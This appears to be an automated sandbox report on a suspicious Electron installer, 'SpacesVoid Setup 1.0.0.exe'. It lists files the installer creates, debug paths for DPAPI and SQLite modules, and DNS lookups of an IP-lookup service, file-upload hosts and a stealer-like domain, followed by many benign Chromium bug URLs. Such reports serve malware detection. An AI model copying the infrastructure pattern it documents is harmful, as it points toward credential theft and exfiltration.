Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e1611148-5250-504b-8870-9793aa65c9f1

Jump to behavior

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txt			Jump to behavior

Source: SpacesVoid Setup 1.0.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D3DCompiler_47.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2436234480.00000000051DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2437718962.00000000051D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2436234480.00000000051DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2544160582.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2508988317.00000000051D5000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2395756562.0000000006B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2387038286.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2387317240.0000000005BB0000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2394763179.0000000006770000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats\dist	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\locales	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 12MB

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 51.91.7.6 51.91.7.6
Source: Joe Sandbox View	IP Address: 172.64.41.3 172.64.41.3

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: file.io
Source: global traffic	DNS traffic detected: DNS query: apileet.hexonst34l3r.com

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1085
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136dumpTranslatedShadersWrite
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1512
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1637
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1936
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2046
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2273
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2894
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2978
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3027
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3729
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3997
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4214
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4267
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4646
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/482
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5469
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5577
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036dumpShaderSourceWrite
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7527
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760enableShaderSubstitutionCheck
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761disableProgramCachingDisables
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8172
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280enableTranslatedShaderSubstitutionCheck
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8291
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8297
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cldr.unicode.org/index/downloads
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/smhasher/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/v8
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1094869
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/110263
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1144207
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1171371
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181068
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181193
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1420130
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1434317
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1456243
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/308366
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/403957
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/550292
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/565179
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642227
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642605
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/644669
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/650547
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/672380
